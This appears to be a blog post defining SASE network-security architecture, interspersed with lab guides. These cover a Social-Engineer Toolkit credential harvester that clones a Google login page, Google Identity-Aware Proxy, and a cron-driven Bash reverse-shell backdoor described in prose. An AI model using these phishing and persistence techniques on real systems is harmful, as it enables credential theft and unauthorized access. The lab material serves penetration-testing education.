  • Secure Web Gateway (SWG)

 

Lab Guide: Phishing Attacks

The Social-Engineer Toolkit (SET)

In this lab, we have a fake Google login page that we can use to capture the username and password. This process is known as phishing, and here, I will use the Social-Engineer Toolkit (SET), specifically designed to perform advanced attacks against the human element. 

Note:

SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester arsenal. The attacks built into the toolkit are intended to be focused attacks against a person or organization used during a penetration test. There are a couple of steps to perform, and I’m using Kali Linux.

  1. Once the Social Engineering Toolkit loads, select 1) Social-Engineering Attacks from the menu. 
  2. Select 2) Website Attack Vectors from the following menu. 
  3. Select 3) Credential Harvester Attack Method from the following menu. 
  4. Select 1) Web Templates method from next to the menu. 
  5. The following prompt will ask for your IP address for the POST request. The default IP [xx.xx.xx.xx] is correct, so hit Enter here.
  6. Next, select the 2—Google template. 

The credential harvester attack is a phishing attack where attackers create deceptive websites or emails to trick unsuspecting victims into providing their login credentials. These malicious actors often mimic legitimate websites or services, luring users into entering their usernames, passwords, or other sensitive information.

Techniques Employed by Credential Harvesters

Credential harvesters employ various techniques to make their attacks more convincing. They may use URL manipulation, where the website’s URL appears genuine, but in reality, it redirects to a fraudulent page designed to capture user credentials. Another method involves creating spoofed emails with links that lead to imitation login pages.

Consequences of Falling Victim to Credential Harvesters

The consequences of falling victim to credential harvesters can be severe. Once attackers obtain login credentials, they can gain unauthorized access to personal accounts, financial information, or corporate networks. This can result in identity theft, financial loss, reputational damage, and compromised privacy.

Analysis: 

    • This is an effortless way for attackers to use malicious links inside emails, texts, or social media messages. If those links are clicked, it directs the user to a fake login page to capture their credentials! 
    • Fortunately, there are several preventive measures individuals and organizations can take to safeguard against credential harvester attacks. Implementing robust and unique passwords, enabling two-factor authentication, and regularly updating software and security patches are effective ways to enhance security.
    • Additionally, being cautious of unsolicited emails, scrutinizing URLs before entering credentials, and educating oneself about phishing techniques can significantly reduce the risk of falling victim to such attacks.

In conclusion, the credential harvester attack method poses a significant threat to individuals and organizations. By understanding the techniques employed by attackers, being aware of the consequences, and implementing preventive measures, we can fortify our defenses against these malicious activities. Remember, staying vigilant and practicing good cybersecurity hygiene is the key to staying one step ahead of cybercriminals.

Back to Basics: SASE Definition

Generally, SASE services include SD-WAN, Zero-Trust Network Access (ZTNA), Cloud Access Security Broker (CASB), NGFW, Secure Web Gateway (SWG), unified management, and orchestration. Just what constitutes a real SASE solution varies significantly by source.

Several organizations, such as the Metro Ethernet Forum (MEF), are trying to establish neutral industry standards for SASE. These standards will pave the way for a universal understanding, the ability to integrate multiple manufacturers into a solution, and a method for teaching SASE.

the rise of sase
Diagram: Cloud-native application security. The rise of SASE.

SASE Meaning

The rise of SASE and digital transformation

There has been a loss of confidence in the network. As a result, organizations uncover weaknesses in their networks when they roll out digital initiatives. This seems to be true for MPLS backbones and in some SD-WAN designs, where there is a lag in security, cloud connectivity, mobility, and site connectivity.

Confidence in SD-WAN and MPLS has significantly decreased when confronted with the digital structure of network transformation. Intrinsically, SD-WAN is not an all-in-one-encompassing solution, whereas MPLS is rigid and fixed.

MPLS forwarding
Diagram: MPLS Overlay

It is expected to find that they were more confident in their networks before adopting digital transformation than post-digital transformations. Therefore, it is difficult to predict the impact of digital change on networks. Enterprises must ensure they have the proper infrastructure performance and security levels. Digital transformation is not just about replacing MPLS. Networking professionals must broaden their focus to encompass security, cloud, and mobility.

sase definition
Diagram: SASE definition. They are driving digital transformation.

WAN Transformation

SASE Meaning

All these problems can be avoided by switching to SASE, a new enterprise networking technology category introduced by Gartner in 2019. SASE meaning is the convergence of security, cloud connectivity, mobility, and site connectivity, enabling the architecture to correlate disparate data points.

It is an all-in-one encompassing solution that provides a ready-made solution for the WAN transformation journey. Gartner expects at least 40% of enterprises to have explicit strategies to adopt SASE by 2024.

Today, customers are looking for a WAN transformation solution that connects and secures all edges – sites, cloud resources, mobile users, and anything else that might emerge tomorrow. MPLS is not the right approach, and some SD-WAN deployments are causing question marks. So, a SASE definition, on the other hand, significantly assists post-digital transformation.

So, let us shine the torch on some of the digital transformation challenges likely to surface. These challenges include complexity with management and operations, site connectivity, performance between locations, inefficient security, and cloud agility.

SASE definition
Diagram: SASE: Combining network and security.

SASE Definition: Secure Access Service Edge (SASE)

The SASE definition combines network security functions (such as SWG, CASB, FWaaS, and Zero Trust Network Access (ZTNA) with SD-WAN to support organizations’ dynamic, secure access needs. These capabilities are primarily delivered by XaaS and are based on the entity’s identity, real-time context, and security/compliance policies.

SASE changes the focal point to the identity of the user and device. With traditional network design, this was the on-premises data center. The conventional enterprise network and network security architectures place the internal data center as the focal point for access.

These designs are proving ineffective and cumbersome with the rise of cloud and mobile. Traffic patterns have changed considerably, and so has the application logic.

  • A key point: “Software-defined” secure access

SASE consolidates networking and security-as-a-service capabilities into a cloud-delivered secure access service edge. The cloud-delivered service provides you with policy-based “software-defined” secure access. The “software-defined” secure access comprises a worldwide fabric of points of presence (POPs) and peering relationships. With the PoP design, the general architecture is to move inspection engines to the sessions, not reroute the engines’ sessions as traditional techniques do. This design is more aligned with today’s traffic patterns and application logic.

        • SASE offers a tailorable network fabric comprising the SASE PoPs geographically dispersed.

The architecture allows you to accurately specify every network session’s performance, reliability, security, and cost. This is based on identity and context. For practical, secure access, decisions must be centered on the entity’s identity at the source of the connection. And not a traditional construct such as the IP address or mere network location. The requesting entity can be the user, device, branch office, IoT device, edge computing location, and policy based on these parameters.

 

Lab Guide: Identity-Aware-Proxy

Identity Security with Google Cloud

Next, we will have a look at Identity security and Google Cloud. Here, I have a  minimal web application with Google App Engine.  Then, an Identity-Aware Proxy (IAP) restricts access based on parameters that I can configure.

Note:

  1. An identity-aware proxy (IAP) is a Google Cloud service allowing fine-grained access control to applications and resources based on user identity. By integrating with Google Cloud Identity and Access Management (IAM), IAP enables organizations to define and enforce access policies easily.
  2. IAP provides a robust solution, whether protecting sensitive data or mitigating the risk of unauthorized access.

See below; I have enabled IAP for a simple application. For access, I now need to tell the IAP services who can access the application. I do this by adding Principles.

Once an app is protected with IAP, it can use the identity information that IAP provides in the web request headers it passes through. So, for additional identity information, the application will get the logged-in user’s email address and a persistent unique user ID assigned by the Google Identity Service to that user—notice below the additional lines in the application code that get the IAP-provided identity data. Additionally, the X-Goog-Authenticated-User- the IAP service provides headers.

Note:

If there is a risk of IAP being turned off or bypassed, your app can check to make sure the identity information it receives is valid. This uses a third web request header added by IAP called X-Goog-IAP-JWT-Assertion. The header’s value is a cryptographically signed object containing user identity data. Your application can verify the digital signature and use the data provided in this object to ensure that IAP provided it without alteration.

Digital signature verification requires several extra steps, such as retrieving the latest set of Google public keys. You can decide whether your application needs these additional steps based on the risk that someone can turn off or bypass IAP and the application’s sensitivity.

IAP Key Features and Benefits

a) Secure Access Control: IAP offers granular control over who can access specific resources, ensuring that only authorized individuals can gain entry. By leveraging context-aware access policies, organizations can define rules based on user attributes, device security status, and more.

b) Multi-Factor Authentication (MFA): IAP supports using MFA, adding an extra layer of security to the authentication process. The risk of unauthorized access is further reduced by requiring users to provide additional verification factors such as SMS codes or security keys.

c) Centralized Logging and Auditing: IAP provides detailed logs and audit trails, allowing organizations to monitor and track access attempts. This enhances visibility and enables swift action against potential security threats.

Implementing Identity-Aware Proxy

Implementing IAP within your Google Cloud environment is a straightforward process. By following these steps, you can ensure a seamless integration:

a) Enabling IAP: Start by enabling IAP in the Google Cloud Console for the desired project. This will activate the necessary APIs and services.

b) Configuring Access Policies: Define access policies based on user identity, resource paths, and other criteria using the Cloud Console or the IAP API.

c) Fine-tuning authentication Methods: Customize the authentication methods according to your organization’s security requirements. This includes enabling MFA and deciding whether to allow or deny unauthenticated users.

Conclusion: Identity-Aware Proxy (IAP) is a robust security solution offered by Google Cloud. With its granular access control, multi-factor authentication, and centralized logging capabilities, IAP provides organizations with the means to ensure secure access to their cloud resources. By implementing IAP, businesses can enhance their security posture and protect against potential threats.

Security and Identity

With a SASE platform, when we create an object, such as a policy in the networking domain, it is then available in other domains, such as security. So, any policies assigned to users are tied to that user regardless of network location. This removes the complexity of managing network and security policies across multiple areas, users, and devices. Again, all of this can be done from one platform.

Also, when examining security solutions, many buy individual appliances that focus on one job. To troubleshoot, you need to gather information, such as the logs from each device. A SIEM is valuable but can only be used in some organizations as a resource-heavy. For those who don’t have ample resources, the manual process is backbreaking, and there will be false positives.

sase security
Diagram: SASE security. The PoP architecture.

SASE Definition with Challenge 1: Managing the Network

Looking across the entire networking and security industry, everyone sells individual point solutions that are not a holistic joined-up offering. Thinking only about MPLS replacement leads to incremental, point solution acquisitions when confronted by digital initiatives, making their networks more complex and costly.

Principally, distributed appliances for network and security at every location require additional tasks such as installation, ongoing management, regular updates, and refreshes. This results in far too many security and network configuration points. We see this all the time with NOC and SOC integration efforts.

Numerous integration points

The point-solution approach addresses one issue and requires a considerable amount of integration. Therefore, you must constantly add solutions to the stack, likely resulting in management overhead and increased complexity. Let’s say you are searching for a new car. Would you prefer to build the car with all the different parts or buy the already-built one?

In the same way, if we examine the network and security industry, the way it has been geared up presently is provided in parts. It’s your job to support, manage, and build the stack over time and scale it when needed. Fundamentally, it would help if you were an expert in all the different parts.

However, if you abstract the complexity into one platform, you don’t need to be an expert in everything. SASE is one of the effective ways to abstract management and operational complexity.

SASE Meaning: How SASE solves this

Converging network and security into a single platform does not require multiple integration points. This will eliminate the need to deploy these point solutions and the complexities of managing each. Essentially, with SASE, we can bring each point solution functionalities together and place them under one hood – the SASE cloud. SASE merges all of the networking and security capabilities into a single platform.

This way, you now have a holistic joined-up offering. Customers don’t need to perform upgrades, size, and scale their network. Instead, all this is done for them in the SASE cloud, creating a fully managed and self-healing architecture.

Besides, the convergence is minimal if something goes wrong in one of the SASE Pops. All of this is automatic, and there is no need to set up new tunnels or have administrators step in to perform configurations.

sase definition
Diagram: SASE definition. No more point solutions.

SASE Definition with Challenge 2: Site Connectivity

SD-WAN appliances require other solutions for global connectivity and to connect, secure, and manage mobile users and cloud resources. As a result, many users are turning to Service Providers to handle the integration. The carrier-managed SD-WAN providers integrate a mix of SD-WAN and security devices to form SD-WAN services.

Unfortunately, this often makes the Service Providers inflexible in accommodating new requests. The telco’s lack of agility and high bandwidth costs will remain problematic. Deploying new locations has been the biggest telco-related frustration, especially when connecting offices outside of the telco’s operating region to the company’s MPLS network. For this, they need to integrate with other telcos.

Video: SD-WAN

In the following video, we will address the basics of SD-WAN and the challenges of the existing WAN. We will also go through popular features of SD-WAN and integration points with, for example, SASE.

SD WAN Tutorial
Prev 1 of 1 Next
Prev 1 of 1 Next

SASE Meaning: How SASE solves this

SASE handles all of the complexities of management. As a result, the administrative overhead for managing and operating a global network that supports site-to-site connectivity and enhanced security, cloud, and mobility is kept to an absolute minimum.

SASE Definition with Challenge 3: Performance Between Locations

The throughput is primarily determined by latency and packet loss, not bandwidth. Therefore, for an optimal experience for global applications, we must explore ways to manage the latency and packet loss end-to-end for last-mile and middle-mile segments. Most SD-WAN vendors don’t control these segments, affecting application performance and service agility.

Consequently, there will be constant tweaking at the remote ends to attain the best performance for your application. With SD-WAN, we can bundle transports and perform link bonding to solve the last mile. However, this does not create any benefits for the middle mile bandwidth.

MPLS will help you overcome the middle-mile problems, but you will likely pay a high price.

Define SASE
Diagram: Define SASE. Link Bonding is only suitable for last-mile performance.

SASE Meaning: How SASE solves this

The SASE cloud already has an optimized converged network and security platforms. Therefore, sites need to connect to the nearest SASE PoP. This way, the sites are placed on the global private backbone to take advantage of global route optimization, dynamic path selection, traffic optimization, and end-to-end encryption. The traffic can also be routed over MPLS, directly between sites (not through the SASE PoP), and from IPsec tunnels to third-party devices. The SASE architecture optimizes the last and middle-mile traffic flows.

Optimization techniques

The SASE global backbone has several techniques that improve the network performance, resulting in predictable, consistent latency and packet loss. The SASE cloud has complete control of each PoP and can employ optimizations. It uses proprietary routing algorithms that factor in latency, packet loss, and jitter.

These routing algorithms favor performance over cost and select the optimal route for every network packet. This is compared to Internet routing, where metrics don’t consider what is best for the application or the type.

SASE Definition with Challenge 4: Cloud Agility

Cloud applications are becoming the most critical to organizations, even more severe than those hosted in private data centers. When delivering cloud resources, we must consider more than just providing connectivity. In the past, when we spoke about agility, we were concerned only with the addition of new on-premises sites.

However, now, this conversation needs to encompass the cloud. Primarily, delivering cloud applications is about providing an application experience as responsive as the on-premises applications. However, most SD-WANs have a low response rate for rapidly offering new public cloud infrastructure. MPLS is expensive, rigid, and not built for cloud access.

SASE Meaning: How SASE solves this

Cloud Native Meaning

SASE natively supports cloud data centers (IaaS) and applications (SaaS) without additional configuration, complexity, or point solutions, enabling built-in cloud connectivity. This further enables the rapid delivery of new public cloud infrastructure.

The SASE PoPs are collocated in the data centers, directly connected to the IXP of the leading IaaS providers, such as Amazon AWS, Microsoft Azure, and Google Cloud Platform. In addition, cloud applications are optimized through SASE’s ability to define the egress points. This helps exit the cloud application traffic at the points closest to the customer’s application instance.

The optimal global routing algorithms can determine the best path from anywhere to the customer’s cloud application instance. This provides optimal performance to the cloud applications regardless of the user’s location.

So, when we talk about performance to the cloud with SASE, the latency to the cloud is comparable to the optimized access provided by the cloud providers, such as AWS Direct Connect or Azure Express Route. So, authentically, SASE provides out-of-the-box cloud performance.

SASE Definition with Challenge 5: Security

The security landscape is constantly evolving. Therefore, network security solutions must develop to form a well-founded landscape. Ransomware and Malware will continue to be the primary security concerns from 2020 onward. This is a challenge for the entire organization to combat the various solutions designed with complex integration points scattered through the network domain.

Security must be a part of any WAN transformation initiative protecting the users and resources regardless of the underlying network managed through a single-pane-of-glass.

However, a bundle of non-integrated security products results in appliance sprawl that hinders your security posture instead of strengthening it. The security solution must defend against emerging threats like malware/ransomware. In addition, it must boost the ability to enforce corporate security policies on mobile users.

Finally, the security solution must also address the increasing cost of buying and managing security appliances and software.

sase edge
Diagram: SASE Edge: The issues of service chaining.

Security and encryption

So, we know there is an increase in complexity due to the disparate tools required to address the different threat vectors. So, for example, we have DLP that can be spread across the SWG, CASB, and DLP but with three other teams managing each. What about the impact of encrypted web traffic on the security infrastructure?

The issue is that most internet traffic is now encrypted, and attackers deliver the payloads, deliver command and control instructions, and exfiltrate data over encrypted protocols. Organizations cannot decrypt all network traffic for performance reasons and avoid looking at sensitive employee information.

Also, there are issues with the scalability of encrypted traffic management solutions. This can, too, cause performance issues.

Lab Guide: Security Backdoors

Using Bash

Bash, short for “Bourne Again SHell,” is a widely used command-line interpreter in Unix-based systems. It provides powerful scripting capabilities, making it a favorite among system administrators and developers. However, this versatility also brings the potential for misuse. This section will explain what a Bash backdoor is and how it functions.

Note:

In the following, I created a backdoor on a corporate machine to maintain persistence within the environment. I performed bash script and system configuration using cron jobs. You will then connect to the created backdoor. Here, we demonstrate how to use tools available on standard operating system installations to bypass an organization’s security controls.

Cron jobs, derived from the word “chronos” meaning time in Greek, are scheduled tasks that run automatically in the background of your server. They follow a specific syntax, using fields to specify when and how often a task should be executed. You can create precise and reliable automated processes by grasping the structure and components of cron jobs.


Analysis: First, the file called file is deleted with the rm command if it already exists. Next, a special pipe, a new communications channel, is called a file. Any information passed to the bash terminal, such as typed commands, is transmitted to a specific IP address and port using the pipe. The | indicates the point at which the output from one Linux command passes information to the next command. Using this single line, you can create a network connection to a specific machine, giving remote access to a user.

Analysis: First, errors when running the cron task are ignored and not printed on the screen. Then, the new cronjob is printed to the screen; in this example, the backdoor bash shell will run every minute. The output of the echoed command is then written to the cronfile with crontab. 

Conclusion: 

Backdoor access refers to a hidden method or vulnerability intentionally created within a system or software that allows unauthorized access or control. It is an alternative entry point that bypasses conventional security measures, often undetected.

While backdoor access can be misused for malicious purposes, it is essential to acknowledge that there are legitimate reasons for its existence. Government agencies may utilize backdoor access to monitor criminal activities or ensure national security. Additionally, software developers may implement backdoor access for debugging and maintenance purposes.

Stringent security measures are necessary to counter the threats posed by backdoor access. Regular system audits, vulnerability assessments, and robust encryption protocols can help identify and patch potential vulnerabilities. Fostering a security-conscious culture among users and promoting awareness of potential risks can strengthen overall cybersecurity.

Video: Stateful Inspection Firewall

We know we have a set of well-defined protocols that are used to communicate over our networks. Let’s call these communication rules. You are probably familiar with the low-layer transport protocols, such as TCP and UDP, and higher application layer protocols, such as HTTP and FTP.

Generally, we interact directly with the application layer and have networking and security devices working at the lower layers. So when Host A wants to talk to Host B, it will go through a series of communication layers with devices working at each layer. A device that works at one of these layers is a stateful firewall.

Stateful Inspection Firewall
Prev 1 of 1 Next
Prev 1 of 1 Next

MPLS and SD-WAN

MPLS does not protect the resources and users, certainly not those connected to the Internet. On the other hand, SD-WAN service offerings are not all created equal since many do not include firewall/security features for threat protection to protect all edges – mobile devices, sites, and cloud resources. This lack of integrated security complicates SD-WAN deployments. Also, this often leads to Malware getting past the perimeter unnoticed.

The cost involved

Security solutions are expensive, and there is never a fixed price. Some security vendors may charge on the usage models for which you don’t yet have the quantity. This makes the process of planning extremely problematic and complex. As the costs keep increasing, we often find that security professionals would trade off point-security solutions due to the associated costs. This is not an effective risk-management strategy.

The security controls are also limited to mobile VPN solutions. More often than not, they are very coarse, forcing IT to open access to all the network resources. Protecting mobile users requires additional security tools like next-generation firewalls (NGFWs). So again, we have another point solution. In addition, mobile VPN solutions provide no last- or middle-mile optimization.

SASE Meaning: How SASE solves this

SASE converges a complete security stack into the network, allowing SASE to bring granular control to sites and mobile and cloud resources. This is done by enforcing the zero-trust principles for all edges. SASE provides anti-malware protection for both WAN and Internet traffic. In addition, for malware detection and prevention, SASE can offer signature and machine-based learning protection consisting of several integrated anti-malware engines.

For malware communication, SASE can stop the outbound traffic to C&C servers based on reputation feeds and network behavioral analysis. Mobile user traffic is fully protected by SASE’s advanced security services, including NGFW, secure web gateway (SWG), threat prevention, and managed threat detection and response.

Furthermore, in the case of mobile, SASE mobile users can dynamically connect to the closest SASE PoP regardless of the location. Again, as discussed previously, the SASE cloud’s relevant optimizations are available for mobile users.

Rethink the WAN

The shift to the cloud, edge computing, and mobility offer new opportunities for IT professionals. To support these digital initiatives, the network professionals must rethink their approach to the WAN transformation. WAN transformation is not just about replacing MPLS with SD-WAN. It needs an all-encompassing solution that provides the proper network performance and security level for enhanced site-to-site connectivity, security, mobile, and cloud.

network security solution
Diagram: SASE, a network security solution.

SASE Meaning: SASE wraps up

SASE is a network and security architecture consolidating numerous network and security functions, traditionally delivered as siloed point solutions, into an integrated cloud service. It combines several network and security capabilities along with cloud-native security functions. The functions are produced from the cloud and provided by the SASE vendor.

They are essentially providing a consolidated, platform-based approach to security. We have a cloud-delivered solution consolidating multiple edge network security controls and network services into a unified solution with centralized management and distributed enforcement.

The appliance-based perimeter

Even Though there has been a shift to the cloud, the traditional perimeter network security solution has remained appliance-based. The shift for moving security controls to the cloud is for better protection and performance, plus ease of deployment and maintenance.

The initial performance of the earlier cloud-delivered solutions has been overcome with the introduction of optimized routing and global footprint. However, there is a split in opinion about performance and protection. Many consider protection and performance prime reasons to remain on-premises and keep the network security solutions on-premises.

Key Components of SASE

The key components of SASE include software-defined wide-area networking (SD-WAN), cloud-native secure web gateways (SWG), zero-trust network access (ZTNA), firewall-as-a-service (FWaaS), and data loss prevention (DLP), among others. These components work harmoniously to provide organizations with a holistic and scalable solution for secure network connectivity, regardless of the location or device used by the end-user.

Benefits of SASE

SASE offers numerous benefits for organizations seeking to enhance their network infrastructure and security posture. Firstly, it provides simplified network management by consolidating various functions into a unified platform. Secondly, it offers an improved user experience through optimized connectivity and reduced latency. Additionally, SASE enables organizations to embrace cloud services securely and facilitates seamless scalability to adapt to changing business demands.

Implications for the Future

As businesses embrace digital transformation and remote work becomes more prevalent, the demand for flexible and secure network architectures like SASE is expected to skyrocket. SASE empowers organizations to overcome the limitations of traditional network setups and enables them to thrive in an increasingly dynamic and interconnected world. With its cloud-native approach and emphasis on security, SASE is poised to redefine how networks are designed and managed in the coming years.




Key SASE Definition Summary Points:

Main Checklist Points To Consider

  • The rise of SASE and the causes of digital transformation.

  • Technical details on the issues of MPLS with the lack of agility. 

  • Technical details on the SASE PoP and the converging of networking and security to a SaaS solution.

  • Discuss the numerous challenges of managing the network and how SASE solves this.

  • A final note on the appliance-based perimeter.

 

Summary: SASE Definition

With the ever-evolving landscape of technology and the increasing demand for secure and efficient networks, a new paradigm has emerged in the realm of network security – SASE, which stands for Secure Access Service Edge. In this blog post, we delved into the definition of SASE, its key components, and its transformative impact on network security.

Section 1: Understanding SASE

SASE, pronounced “sassy,” is a comprehensive framework that combines network security and wide area networking (WAN) capabilities into a single cloud-based service model. It aims to provide users with secure access to applications and data, regardless of their location or the devices they use. By converging networking and security functions, SASE simplifies the network architecture and enhances overall performance.

Section 2: The Key Components of SASE

To fully grasp the essence of SASE, it is essential to explore its core components. These include:

1. Secure Web Gateway (SWG): The SWG component of SASE ensures safe web browsing by inspecting and filtering web traffic, protecting users from malicious websites, and enforcing internet usage policies.

2. Cloud Access Security Broker (CASB): CASB provides visibility and control over data as it moves between the organization’s network and multiple cloud platforms. It safeguards against cloud-specific threats and helps enforce data loss prevention policies.

3. Firewall-as-a-Service (FWaaS): FWaaS offers scalable and flexible firewall protection, eliminating the need for traditional hardware-based firewalls. It enforces security policies and controls access to applications and data, regardless of their location.

4. Zero Trust Network Access (ZTNA): ZTNA ensures that users and devices are continuously authenticated and authorized before accessing resources. It replaces traditional VPNs with more granular and context-aware access policies, reducing the risk of unauthorized access.

Section 3: The Benefits of SASE

SASE brings numerous advantages to organizations seeking enhanced network security and performance:

1. Simplified Architecture: By consolidating various network and security functions, SASE eliminates the need for multiple-point solutions, reducing complexity and management overhead.

2. Enhanced Security: With its comprehensive approach, SASE provides robust protection against emerging threats, ensuring data confidentiality and integrity across the network.

3. Improved User Experience: SASE enables secure access to applications and data from any location, offering a seamless user experience without compromising security.

Conclusion:

In conclusion, SASE represents a paradigm shift in network security, revolutionizing how organizations approach their network architecture. By converging security and networking functions, SASE provides a comprehensive and scalable solution that addresses the evolving challenges of today’s digital landscape. Embracing SASE empowers organizations to navigate the complexities of network security and embrace a future-ready approach.